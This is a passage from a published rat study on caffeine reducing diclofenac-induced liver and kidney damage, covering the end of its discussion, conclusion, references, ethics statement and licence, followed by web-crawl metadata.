properties of Caffeine can be related to its suppression ability against COX, NO, and LPO resulting in the hindered release of IL-6, nuclear factor-κB (NF-κB) and TNF-α [53, 54]. On the other hand, the beneficial activity of Caffeine against Dic toxicity on the liver and kidney could be also attributed to its ability in enhancing GPx release level. Meanwhile, the histopathological findings from both the liver and kidney tissues in the current study revealed severe lesions and atrophy following Dic administration. On the other hand, the Caffeine exposed groups demonstrated highly intact hepatic and renal architecture. Thus, indicating the hepato-renal protective efficiency of Caffeine by maintaining normal functions and structural integrity of the liver and kidney against NSAIDs toxicity. Whereas, this observed efficacy can be related to the following caffeine-mediated mechanisms: antioxidant, anti-inflammatory, DNA damage inhibitor, and diuretic potentials [56].
Several previously conducted epidemiological studies have reported the direct link between Dic misuse and hepatic/renal damages in addition to highlighting the ability of caffeine to alleviate or hinder these Dic-induced damages. Owumi, Dim [28] and Elshopakey, Elazab [45] reported in line with our findings that prolonged chronic intake of Dic enhance cellular oxidative damage and inflammatory cytokines release including ROS, NO, TNF-α, and NF-kB resulting in severe deteriorations on the liver and kidney. Herein, we provide a clear evidence in agreement with previously reported results that the treatment with caffeine significantly alleviated the severe degree of liver and kidney damages induced by Dic administration [20, 21, 53, 57, 58]. This indicates the efficiency of daily caffeine administration on protecting the liver and kidney form Dic deleterious effect on prolong use due to its antioxidant, anti-inflammatory, diuretic potentials, and protective effect against DNA damage [20, 21, 28, 45, 53, 57, 58].
Study limitations
This study was only conducted on male rats where this can be considered a kind of limitations as female hormones might augments the alleviating actions of caffeine against Dic-induced liver and kidney damages [59]. Previous studies have reported that gender differences may affect caffeine metabolism and physiological responses to daily caffeine administration [59]. Thus, further studies are required to study the effects of female sex hormones against daily caffeine administration.
Conclusion
The findings of the current study displayed that the daily exposure to Diclofenac elicited severe hepatic and renal damage in rats which can be related to triggered oxidative stress, DNA damages and inflammatory cytokines release. Caffeine is highly rich in several photochemical derivatives including flavonoids, triterpenes, and polyphones where its beneficial actions can be attributed to its several constituents. Thus, our observed results indicated that daily Caffeine administration relieved Diclofenac-induced hepatic and renal damages by enhancing the overall antioxidant capacity status, and suppressing pro-inflammatory cytokines release, inhibiting chromosomal aberrations, and adjusting hematological abnormalities. Thereby it can be concluded that the daily administration of Caffeine can help to alleviate drugs and chemicals-induced hepatic and renal damage via various mechanisms indicating the importance of developing novel pharmaceutically designed drugs containing caffeine compounds for it various therapeutic potentials. Thus, it is recommended to subsequently consider Caffeine to be further assessed in major clinical trials for reducing hepatic and renal induced damages as a drawback of the daily administration of OTC drugs such as Diclofenac to be more ascertain of its efficacy and efficiency clinically.
Availability of data and materials
The obtained data analyzed during the current study are available from the corresponding author on reasonable request.
Abbreviations
Dic:
Diclofenac
NSAID:
Non-steroidal anti-inflammatory drug
ROS:
Reactive Oxygen Species
DMEM:
Dulbecco’s Modified Eagle Medium
LPO:
Lipid peroxidation
TNF-α:
Tumor Necrosis Factor-α
AST:
Aspartate Aminotransferase
ALT:
Alanine Aminotransferase
NO:
Nitric Oxide
References
1. Blanca-Lopez N, Canto MG, Blanca M. Chapter 18 - other NSAIDs reactions. In: Khan DA, Banerji A, editors. Drug Allergy Testing: Elsevier; 2018. pp. 177–96.
Google Scholar
2. Bevaart L, Vervoordeldonk MJ, Tak PP. Evaluation of therapeutic targets in animal models of arthritis: how does it relate to rheumatoid arthritis? Arthr Rhuem. 2010;62(8):2192–205.
Article CAS Google Scholar
3. Gan TJ. Diclofenac: an update on its mechanism of action and safety profile. Curr Med Res Opin. 2010;26(7):1715–31.
Article CAS Google Scholar
4. Bindu S, Mazumder S, Dey S, Pal C, Goyal M, Alam A, et al. Nonsteroidal anti-inflammatory drug induces proinflammatory damage in gastric mucosa through NF-κB activation and neutrophil infiltration: anti-inflammatory role of heme oxygenase-1 against nonsteroidal anti-inflammatory drug. Free Radic Biol Med. 2013;65:456–67.
Article CAS Google Scholar
5. Olayaki LA, Adeyemi WJ, Yinusa JS, Adedayo GA. Omega-3 fatty acids moderate oxidative and proinflammatory events in experimental hepatotoxicity in Wistar rats: comparison with livolin. Synergy. 2018;7:17–24.
Article Google Scholar
6. Ahmed AY, Gad AM, El-Raouf OMA. Curcumin ameliorates diclofenac sodium-induced nephrotoxicity in male albino rats. J Biochem Mol Toxicol. 2017;31(10):e21951.
Article Google Scholar
7. Altman R, Bosch B, Brune K, Patrignani P, Young C. Advances in NSAID development: evolution of diclofenac products using pharmaceutical technology. Drugs. 2015;75(8):859–77.
Article CAS Google Scholar
8. Aycan İ, Elpek Ö, Akkaya B, Kıraç E, Tuzcu H, Kaya S, et al. Diclofenac induced gastrointestinal and renal toxicity is alleviated by thymoquinone treatment. Food Chem Toxicol. 2018;118:795–804.
Article CAS Google Scholar
9. Näslund J, Fick J, Asker N, Ekman E, Larsson DGJ, Norrgren L. Diclofenac affects kidney histology in the three-spined stickleback (Gasterosteus aculeatus) at low µg/L concentrations. Aquat Toxicol. 2017;189:87–96.
Article Google Scholar
10. Kh Z, El-Ashmawy IM, Arabia S, editors. Hepato-Renal and Hematological Effects of Diclofenac Sodium in Rats 2013.
11. Baravalia Y, Vaghasiya Y, Chanda S. Hepatoprotective effect of Woodfordia fruticosa Kurz flowers on diclofenac sodium induced liver toxicity in rats. Asian Pac J Trop Med. 2011;4(5):342–6.
Article Google Scholar
12. Francois H, Facemire C, Kumar A, Audoly L, Koller B, Coffman T. Role of microsomal prostaglandin E synthase 1 in the kidney. J Am Soc Nephrol. 2007;18(5):1466–75.
Article CAS Google Scholar
13. Breyer MD, Hao C, Qi Z. Cyclooxygenase-2 selective inhibitors and the kidney. Curr Opin Crit Care. 2001;7(6):393–400.
Article CAS Google Scholar
14. Ungprasert P, Cheungpasitporn W, Crowson CS, Matteson EL. Individual non-steroidal anti-inflammatory drugs and risk of acute kidney injury: a systematic review and meta-analysis of observational studies. Eur J Intern Med. 2015;26(4):285–91.
Article CAS Google Scholar
15. Ng LE, Vincent AS, Halliwell B, Wong KP. Action of diclofenac on kidney mitochondria and cells. Biochem Biophys Res Commun. 2006;348(2):494–500.
Article CAS Google Scholar
16. Huang T, Zhang G, Chong S, Liu Y, Zhang N, Fang S, et al. Effects and mechanism of diclofenac degradation in aqueous solution by US/Zn0. Ultrason Sonochem. 2017;37:676–85.
Article CAS Google Scholar
17. Jena NR. DNA damage by reactive species: mechanisms, mutation and repair. J Biosci. 2012;37(3):503–17.
Article CAS Google Scholar
18. Lu YC, Yeh WC, Ohashi PS. LPS/TLR4 signal transduction pathway. Cytokine. 2008;42(2):145–51.
Article CAS Google Scholar
19. Anwar MM, Laila IMI. Protective and restorative potency of diosmin natural flavonoid compound against tramadol-induced testicular damage and infertility in male rats. Nat Prod Res. 2022:1–5. https://0-doi-org.brum.beds.ac.uk/10.1080/14786419.2022.2090937.
20. Olcina GJ, Muñoz D, Timón R, Caballero MJ, Maynar JI, Córdova A, et al. Effect of caffeine on oxidative stress during maximum incremental exercise. J sports Sci Med. 2006;5(4):621–8.
Google Scholar
21. Lv X, Chen Z, Li J, Zhang L, Liu H, Huang C, et al. Caffeine protects against alcoholic liver injury by attenuating inflammatory response and oxidative stress. Inflamm Res. 2010;59(8):635–45.
Article CAS Google Scholar
22. Tommerdahl KL, Hu EA, Selvin E, Steffen LM, Coresh J, Grams ME, et al. Coffee Consumption May mitigate the risk for acute kidney Injury: results from the atherosclerosis risk in Communities Study. Kidney Int Rep. 2022;7(7):1665–72.
Article Google Scholar
23. Rezaie A, Pashmforosh M, Haghi M, Fazlara A, Haghighat N, Shahriari A. Hepatoprotective effect of caffeine on diethylnitrosamine-induced liver injury in rats. Bulgarian J Veterinary Med. 2014;17:183-–90.
Google Scholar
24. Ruhl CE, Everhart JE. Coffee and tea consumption are associated with a lower incidence of chronic liver disease in the United States. Gastroenterology. 2005;129(6):1928–36.
Article Google Scholar
25. Kennedy OJ, Pirastu N, Poole R, Fallowfield JA, Hayes PC, Grzeszkowiak EJ, et al. Coffee consumption and kidney function: a mendelian randomization study. Am J Kidney Dis. 2020;75(5):753–61.
Article CAS Google Scholar
26. Ruhl CE, Everhart JE. Coffee and caffeine consumption reduce the risk of elevated serum alanine aminotransferase activity in the United States. Gastroenterology. 2005;128(1):24–32.
Article CAS Google Scholar
27. Srithongkul T, Ungprasert P. Coffee Consumption is Associated with a decreased risk of incident chronic kidney disease: a systematic review and Meta-analysis of Cohort Studies. Eur J Intern Med. 2020;77:111–6.
Article Google Scholar
28. Owumi SE, Dim UJ. Biochemical alterations in diclofenac-treated rats: Effect of selenium on oxidative stress, inflammation, and hematological changes. Toxicol Res Application. 2019;3:2397847319874359.
CAS Google Scholar
29. Sheth S, Sheehan K, Dhukhwa A, Al Aameri RFH, Mamillapalli C, Mukherjea D, et al. Oral administration of Caffeine exacerbates Cisplatin-Induced hearing loss. Sci Rep. 2019;9(1):9571.
Article Google Scholar
30. Tice RR, Hayashi M, MacGregor JT, Anderson D, Blakey DH, Holden HE, et al. Report from the working group on the in vivo mammalian bone marrow chromosomal aberration test. Mutat Res. 1994;312(3):305–12.
Article CAS Google Scholar
31. Moore FR, Urda GA, Krishna G, Theiss JC. An in vivo/in vitro method for assessing micronucleus and chromosome aberration induction in rat bone marrow and spleen 1. Studies with cyclophosphamide. Mutat Res/Environ Mutagen Relat Subj. 1995;335(2):191–9.
CAS Google Scholar
32. Drabkin DL, Austin JH. Spectrophotometric studies: I. Spectrophotometric constants for common hemoglobin. Derivatives in human, dog, and rabbit blood. J Biol Chem. 1932;98(2):719–33.
Article CAS Google Scholar
33. Onyinyechukwu AA. Haematology and Clinical Biochemistry Findings Associated with equine Diseases - a review. Notulae Scientia Biologicae. 2017;9(1):1–21. https://0-doi-org.brum.beds.ac.uk/10.15835/nsb919939.
34. Mihara M, Uchiyama M. Determination of malonaldehyde precursor in tissues by thiobarbituric acid test. Anal Biochem. 1978;86(1):271–8.
Article CAS Google Scholar
35. Moreno I, Pichardo S, Jos A, Gómez-Amores L, Mate A, Vazquez CM, et al. Antioxidant enzyme activity and lipid peroxidation in liver and kidney of rats exposed to microcystin-LR administered intraperitoneally. Toxicon. 2005;45(4):395–402.
Article CAS Google Scholar
36. Brigelius-Flohé R. Tissue-specific functions of individual glutathione peroxidases. Free Radic Biol Med. 1999;27(9–10):951–65.
Article Google Scholar
37. Chiu DTY, Stults FH, Tappel AL. Purification and properties of rat lung soluble glutathione peroxidase. Biochim et Biophys Acta (BBA) - Enzymol. 1976;445(3):558–66.
Article CAS Google Scholar
38. Green LC, Wagner DA, Glogowski J, Skipper PL, Wishnok JS, Tannenbaum SR. Analysis of nitrate, nitrite, and [15 N]nitrate in biological fluids. Anal Biochem. 1982;126(1):131–8.
Article CAS Google Scholar
39. Bancroft JD, Gamble M, Jones ML, Totty BA. Theory and practice of histological techniques. Connective tissues and stains, 15thedn Churchill Livingstone Publications. 2004:139–200.
40. Galati G, Tafazoli S, Sabzevari O, Chan TS, O’Brien PJ. Idiosyncratic NSAID drug induced oxidative stress. Chemico-Biol Interact. 2002;142(1–2):25–41.
Article CAS Google Scholar
41. Alabi QK, Akomolafe RO, Olukiran OS, Adeyemi WJ, Nafiu AO, Adefisayo MA, et al. The Garcinia kola biflavonoid kolaviron attenuates experimental hepatotoxicity induced by diclofenac. Pathophysiol. 2017;24(4):281–90.
Article CAS Google Scholar
42. Lazarska KE, Dekker SJ, Vermeulen NPE, Commandeur JNM. Effect of UGT2B7*2 and CYP2C8*4 polymorphisms on diclofenac metabolism. Toxicol Lett. 2018;284:70–8.
Article CAS Google Scholar
43. Dragovic S, Boerma JS, Vermeulen NP, Commandeur JN. Effect of human glutathione S-transferases on glutathione-dependent inactivation of cytochrome P450-dependent reactive intermediates of diclofenac. Chem Res Toxicol. 2013;26(11):1632–41.
Article CAS Google Scholar
44. Masubuchi Y, Nakayama S, Horie T. Role of mitochondrial permeability transition in diclofenac-induced hepatocyte injury in rats. Hepatology (Baltimore MD). 2002;35(3):544–51.
Article CAS Google Scholar
45. Elshopakey GE, Elazab ST. Cinnamon aqueous extract attenuates diclofenac sodium and oxytetracycline mediated hepato-renal toxicity and modulates oxidative stress, cell apoptosis, and inflammation in male albino rats. Vet Sci. 2021;8(1). https://0-doi-org.brum.beds.ac.uk/10.3390/vetsci8010009.
46. Sahu N, Mishra G, Chandra HK, Nirala SK, Bhadauria M. Naringenin mitigates antituberculosis drugs induced hepatic and renal injury in rats. J Traditional Complement Med. 2020;10(1):26–35.
Article Google Scholar
47. Peter SJ, Basha SK, Giridharan R, Lavinya BU, Sabina EP. Suppressive effect of Spirulina fusiformis on diclofenac-induced hepato-renal injury and gastrointestinal ulcer in Wistar albino rats: A biochemical and histological approach. Biomed Pharmacother. 2017;88:11 – 8.
48. Anderson AH, Yang W, Hsu CY, Joffe MM, Leonard MB, Xie D, et al. Estimating GFR among participants in the chronic renal insufficiency cohort (CRIC) study. Am J Kidney Dis. 2012;60(2):250–61.
Article Google Scholar
49. Motawi TK, Ahmed SA, El-Boghdady NA, Metwally NS, Nasr NN. Impact of betanin against paracetamol and diclofenac induced hepato-renal damage in rats. Biomarkers. 2020;25(1):86–93.
50. Jabir NR, Islam MT, Tabrez S, Shakil S, Zaidi SK, Khan FR, et al. An insight towards anticancer potential of major coffee constituents. BioFactors. 2018;44(4):315–26.
Article CAS Google Scholar
51. Lee KJ, Choi JH, Jeong HG. Hepatoprotective and antioxidant effects of the coffee diterpenes kahweol and cafestol on carbon tetrachloride-induced liver damage in mice. Food Chem Toxicol. 2007;45(11):2118–25.
Article CAS Google Scholar
52. Guth I, Matos-Pardal CF, Ferreira-Lima R, Loureiro-Rebouças R, Sobral AC, Moraes-Marques CA, et al. Caffeine attenuates liver damage and improves neurologic signs in a rat model of hepatic encephalopathy. Revista de Gastroenterologia de Mexico. 2022;87(2):159–69.
Article CAS Google Scholar
53. Devasagayam TP, Kamat JP, Mohan H, Kesavan PC. Caffeine as an antioxidant: inhibition of lipid peroxidation induced by reactive oxygen species. Biochim Biophys Acta. 1996;1282(1):63–70.
Article Google Scholar
54. Choi S, Jung S, Ko KS. Effects of Coffee extracts with different roasting degrees on antioxidant and anti-inflammatory Systems in mice. Nutrients. 2018;10(3):363.
Article Google Scholar
55. Volz N, Boettler U, Winkler S, Teller N, Schwarz C, Bakuradze T, et al. Effect of Coffee Combining Green Coffee Bean constituents with typical Roasting Products on the Nrf2/ARE pathway in Vitro and in vivo. J Agric Food Chem. 2012;60:9631–41.
Article CAS Google Scholar
56. Khazaei M, Bayat PD, Ghanbari A, Khazaei S, Feizian M, Khodaei A, et al. Protective effects of subchronic caffeine administration on cisplatin induced urogenital toxicity in male mice. Indian J Exp Biol. 2012;50(9):638–44.
CAS Google Scholar
57. Salomone F, Galvano F, Li Volti G. Molecular bases underlying the hepatoprotective effects of coffee. Nutrients. 2017;9(1). https://0-doi-org.brum.beds.ac.uk/10.3390/nu9010085.
58. Pashmforoosh M, Rezaie A, Haghi-Karamallah M, Fazlara A, Shahriari A, Najafzadeh H. Effects of Caffeine on Renal Toxicity. Induc Diethylnitrosamine. 2015;17(1):e1917.
Google Scholar
59. Temple JL, Ziegler AM. Gender differences in subjective and physiological responses to Caffeine and the role of Steroid Hormones. J Caffeine Res. 2011;1(1):41–8.
Article CAS Google Scholar
Download references
Acknowledgements
Not applicable.
Funding
Open access funding provided by The Science, Technology & Innovation Funding Authority (STDF) in cooperation with The Egyptian Knowledge Bank (EKB). The authors declare that no funds, grants, or other support were received during the preparation of this manuscript.
Author information
Authors and Affiliations
Authors
Contributions
All authors contributed to the study conception and design. Material preparation, data collection and analysis were performed by [MM.A], and [IMIL]. [MM.A] wrote the main manuscript and prepared the figures. All authors read and approved the final manuscript.
Corresponding author
Correspondence to Mai M. Anwar.
Ethics declarations
Ethics approval and consent to participate
Written permission of the animal facility house of NODCAR was taken to get the twenty-four male Wistar Albino rats weighing from 200 to 250 gm in order to perform the experimental design. All the conducted experimental procedures of the current study were approved by the Animal Research and Ethical committee of National organization of Drug Control and Research (NODCAR) approval number (NODCAR/II/53/2022). The experimental design was conducted under relevant regulations and guidelines of the Laboratory Animals use in Biomedical Research in compliance with the ARRIVE guidelines.
Consent for publication
Not applicable.
Competing interests
The authors declare that they have no competing interests.
Additional information
Publisher’s Note
Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Rights and permissions
Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article's Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/. The Creative Commons Public Domain Dedication waiver (http://creativecommons.org/publicdomain/zero/1.0/) applies to the data made available in this article, unless otherwise stated in a credit line to the data.
Reprints and permissions
About this article
Check for updates. Verify currency and authenticity via CrossMark
Cite this article
Anwar, M.M., Laila, I.M.I. Mitigative effect of caffeine against diclofenac-induced hepato-renal damage and chromosomal aberrations in male albino rats. BMC Complement Med Ther 22, 327 (2022). https://0-doi-org.brum.beds.ac.uk/10.1186/s12906-022-03802-y
Download citation
• Received:
• Accepted:
• Published:
• DOI: https://0-doi-org.brum.beds.ac.uk/10.1186/s12906-022-03802-y
Keywords
|
{
"url": "https://0-bmccomplementmedtherapies-biomedcentral-com.brum.beds.ac.uk/articles/10.1186/s12906-022-03802-y",
"source_domain": "0-bmccomplementmedtherapies-biomedcentral-com.brum.beds.ac.uk",
"snapshot_id": "CC-MAIN-2024-26",
"warc_metadata": {
"Content-Length": "452543",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:47SHUQCVM6MFHLE2TWKDEIMVIJZWF6SX",
"WARC-Concurrent-To": "<urn:uuid:582aa92d-aeda-4b0f-b75b-28e8268a78a1>",
"WARC-Date": "2024-06-14T08:26:20Z",
"WARC-IP-Address": "194.80.219.188",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:RBLNH27JY2DBY4C7GJSSVV7JUVVFFT4F",
"WARC-Record-ID": "<urn:uuid:eb4d1c70-01c7-4527-a7cc-31ed32b501f6>",
"WARC-Target-URI": "https://0-bmccomplementmedtherapies-biomedcentral-com.brum.beds.ac.uk/articles/10.1186/s12906-022-03802-y",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:fef75c0f-ad9c-43d0-b917-0c1c857006d4>"
},
"warc_info": "isPartOf: CC-MAIN-2024-26\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for June 2024\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-185\r\nsoftware: Apache Nutch 1.20 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.5-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
21,
22,
147,
148,
157,
158,
169,
170,
620,
621,
625,
626,
751,
752,
760,
761,
1527,
1528,
1536,
1537,
1872,
1873,
1884,
1885,
2031,
2032,
2052,
2053,
2066,
2067,
3174,
3175,
5126,
5127,
6702,
6703,
7255,
7256,
7278,
7279,
7289,
7290,
7732,
7733,
7741,
7742,
8613,
8614,
8627,
8628,
9348,
9349,
9377,
9378,
10760,
10761,
10818,
10819,
11117,
11118,
11161,
11162,
12032,
12033,
12048,
12049,
12328,
12329,
12350,
12351,
12690,
12691,
12699,
12700,
12763,
12764,
13744,
13745,
13860,
13861,
13935,
13936,
14701,
14702,
14789,
14790,
14898,
14899,
15780,
15781,
15788,
15797,
15798,
16137,
16138,
16274,
16275,
17201,
17202,
17209,
17218,
17219,
17579,
17580,
17657,
17658,
18487,
18488,
18495,
18504,
18505,
18859,
18860,
18950,
18951,
20064,
20065,
20072,
20081,
20082,
20500,
20501,
20622,
20623,
20677,
20678,
21358,
21359,
21366,
21375,
21376,
22455,
22456,
22467,
22468,
23386,
23387,
25795,
25796,
28137,
28138,
29163,
29164,
29182,
29183,
29669,
29670,
29681,
29682,
31017,
31018,
31053,
31054,
31173,
31174,
31188,
31189,
31194,
31195,
31206,
31207,
31214,
31215,
31252,
31253,
31258,
31259,
31283,
31284,
31290,
31291,
31324,
31325,
31330,
31331,
31350,
31351,
31358,
31359,
31383,
31384,
31389,
31390,
31417,
31418,
31423,
31424,
31449,
31450,
31454,
31455,
31468,
31469,
31480,
31481,
31642,
31643,
31663,
31664,
31850,
31851,
31885,
31886,
32007,
32008,
32042,
32043,
32371,
32372,
32406,
32407,
32620,
32621,
32650,
32651,
32814,
32815,
32844,
32845,
33024,
33025,
33059,
33060,
33259,
33260,
33294,
33295,
33514,
33515,
33544,
33545,
33665,
33666,
33861,
33862,
33891,
33892,
34061,
34062,
34096,
34097,
34221,
34222,
34256,
34257,
34504,
34505,
34539,
34540,
34691,
34692,
34726,
34727,
34905,
34906,
34940,
34941,
35050,
35051,
35085,
35086,
35185,
35186,
35220,
35221,
35483,
35484,
35673,
35674,
35694,
35695,
35893,
35894,
35928,
35929,
36167,
36168,
36197,
36198,
36408,
36409,
36429,
36430,
36609,
36610,
36639,
36640,
36837,
36838,
36872,
36873,
37060,
37061,
37095,
37096,
37312,
37313,
37342,
37343,
37550,
37551,
37576,
37577,
37766,
37767,
37796,
37797,
38005,
38006,
38040,
38041,
38299,
38300,
38325,
38326,
38515,
38516,
38550,
38551,
38765,
38766,
38907,
38908,
38942,
38943,
39187,
39188,
39222,
39223,
39356,
39357,
39386,
39387,
39558,
39559,
39593,
39594,
39776,
39777,
39811,
39812,
39998,
39999,
40156,
40157,
40191,
40192,
40413,
40414,
40448,
40449,
40611,
40612,
40646,
40647,
40892,
40893,
40927,
40928,
41109,
41110,
41144,
41145,
41445,
41446,
41640,
41641,
41670,
41671,
41947,
41948,
42145,
42146,
42175,
42176,
42361,
42362,
42535,
42536,
42570,
42571,
42785,
42786,
42820,
42821,
43091,
43092,
43126,
43127,
43319,
43320,
43349,
43350,
43519,
43520,
43549,
43550,
43799,
43800,
43834,
43835,
44064,
44065,
44090,
44091,
44274,
44275,
44448,
44449,
44469,
44470,
44638,
44639,
44673,
44674,
44694,
44695,
44712,
44713,
44729,
44730,
44738,
44739,
45005,
45006,
45025,
45026,
45051,
45052,
45060,
45061,
45075,
45076,
45336,
45337,
45358,
45359,
45391,
45392,
45412,
45413,
45456,
45457,
46042,
46043,
46067,
46068,
46084,
46085,
46105,
46106,
46165,
46166,
46189,
46190,
46207,
46208,
46327,
46328,
46351,
46352,
47414,
47415,
47440,
47441,
47460,
47461,
47527,
47528,
47546,
47547,
47801,
47802,
47820,
47821,
47835,
47836,
47850,
47851,
47866,
47867,
47937,
47938
],
"line_end_idx": [
21,
22,
147,
148,
157,
158,
169,
170,
620,
621,
625,
626,
751,
752,
760,
761,
1527,
1528,
1536,
1537,
1872,
1873,
1884,
1885,
2031,
2032,
2052,
2053,
2066,
2067,
3174,
3175,
5126,
5127,
6702,
6703,
7255,
7256,
7278,
7279,
7289,
7290,
7732,
7733,
7741,
7742,
8613,
8614,
8627,
8628,
9348,
9349,
9377,
9378,
10760,
10761,
10818,
10819,
11117,
11118,
11161,
11162,
12032,
12033,
12048,
12049,
12328,
12329,
12350,
12351,
12690,
12691,
12699,
12700,
12763,
12764,
13744,
13745,
13860,
13861,
13935,
13936,
14701,
14702,
14789,
14790,
14898,
14899,
15780,
15781,
15788,
15797,
15798,
16137,
16138,
16274,
16275,
17201,
17202,
17209,
17218,
17219,
17579,
17580,
17657,
17658,
18487,
18488,
18495,
18504,
18505,
18859,
18860,
18950,
18951,
20064,
20065,
20072,
20081,
20082,
20500,
20501,
20622,
20623,
20677,
20678,
21358,
21359,
21366,
21375,
21376,
22455,
22456,
22467,
22468,
23386,
23387,
25795,
25796,
28137,
28138,
29163,
29164,
29182,
29183,
29669,
29670,
29681,
29682,
31017,
31018,
31053,
31054,
31173,
31174,
31188,
31189,
31194,
31195,
31206,
31207,
31214,
31215,
31252,
31253,
31258,
31259,
31283,
31284,
31290,
31291,
31324,
31325,
31330,
31331,
31350,
31351,
31358,
31359,
31383,
31384,
31389,
31390,
31417,
31418,
31423,
31424,
31449,
31450,
31454,
31455,
31468,
31469,
31480,
31481,
31642,
31643,
31663,
31664,
31850,
31851,
31885,
31886,
32007,
32008,
32042,
32043,
32371,
32372,
32406,
32407,
32620,
32621,
32650,
32651,
32814,
32815,
32844,
32845,
33024,
33025,
33059,
33060,
33259,
33260,
33294,
33295,
33514,
33515,
33544,
33545,
33665,
33666,
33861,
33862,
33891,
33892,
34061,
34062,
34096,
34097,
34221,
34222,
34256,
34257,
34504,
34505,
34539,
34540,
34691,
34692,
34726,
34727,
34905,
34906,
34940,
34941,
35050,
35051,
35085,
35086,
35185,
35186,
35220,
35221,
35483,
35484,
35673,
35674,
35694,
35695,
35893,
35894,
35928,
35929,
36167,
36168,
36197,
36198,
36408,
36409,
36429,
36430,
36609,
36610,
36639,
36640,
36837,
36838,
36872,
36873,
37060,
37061,
37095,
37096,
37312,
37313,
37342,
37343,
37550,
37551,
37576,
37577,
37766,
37767,
37796,
37797,
38005,
38006,
38040,
38041,
38299,
38300,
38325,
38326,
38515,
38516,
38550,
38551,
38765,
38766,
38907,
38908,
38942,
38943,
39187,
39188,
39222,
39223,
39356,
39357,
39386,
39387,
39558,
39559,
39593,
39594,
39776,
39777,
39811,
39812,
39998,
39999,
40156,
40157,
40191,
40192,
40413,
40414,
40448,
40449,
40611,
40612,
40646,
40647,
40892,
40893,
40927,
40928,
41109,
41110,
41144,
41145,
41445,
41446,
41640,
41641,
41670,
41671,
41947,
41948,
42145,
42146,
42175,
42176,
42361,
42362,
42535,
42536,
42570,
42571,
42785,
42786,
42820,
42821,
43091,
43092,
43126,
43127,
43319,
43320,
43349,
43350,
43519,
43520,
43549,
43550,
43799,
43800,
43834,
43835,
44064,
44065,
44090,
44091,
44274,
44275,
44448,
44449,
44469,
44470,
44638,
44639,
44673,
44674,
44694,
44695,
44712,
44713,
44729,
44730,
44738,
44739,
45005,
45006,
45025,
45026,
45051,
45052,
45060,
45061,
45075,
45076,
45336,
45337,
45358,
45359,
45391,
45392,
45412,
45413,
45456,
45457,
46042,
46043,
46067,
46068,
46084,
46085,
46105,
46106,
46165,
46166,
46189,
46190,
46207,
46208,
46327,
46328,
46351,
46352,
47414,
47415,
47440,
47441,
47460,
47461,
47527,
47528,
47546,
47547,
47801,
47802,
47820,
47821,
47835,
47836,
47850,
47851,
47866,
47867,
47937,
47938,
47946
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 47946,
"ccnet_original_nlines": 483,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 3,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2075531929731369,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.05117021128535271,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.29627659916877747,
"rps_doc_frac_unique_words": 0.27597931027412415,
"rps_doc_mean_word_length": 5.653806209564209,
"rps_doc_num_sentences": 596,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 6.3964715003967285,
"rps_doc_word_count": 6765,
"rps_doc_frac_chars_dupe_10grams": 0.07582096010446548,
"rps_doc_frac_chars_dupe_5grams": 0.165655717253685,
"rps_doc_frac_chars_dupe_6grams": 0.1270131766796112,
"rps_doc_frac_chars_dupe_7grams": 0.10285504907369614,
"rps_doc_frac_chars_dupe_8grams": 0.09302446991205215,
"rps_doc_frac_chars_dupe_9grams": 0.08319389075040817,
"rps_doc_frac_chars_top_2gram": 0.012235930189490318,
"rps_doc_frac_chars_top_3gram": 0.018667640164494514,
"rps_doc_frac_chars_top_4gram": 0.018641499802470207,
"rps_doc_books_importance": -4428.53564453125,
"rps_doc_books_importance_length_correction": -4428.53564453125,
"rps_doc_openwebtext_importance": -2560.760009765625,
"rps_doc_openwebtext_importance_length_correction": -2560.760009765625,
"rps_doc_wikipedia_importance": -1645.13671875,
"rps_doc_wikipedia_importance_length_correction": -1645.13671875
},
"fasttext": {
"dclm": 0.028608260676264763,
"english": 0.857542097568512,
"fineweb_edu_approx": 2.158154249191284,
"eai_general_math": 0.18208277225494385,
"eai_open_web_math": 0.42600852251052856,
"eai_web_code": 0.009486679919064045
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "615.5",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
},
"secondary": {
"code": "615.54",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "5",
"label": "Evaluate"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
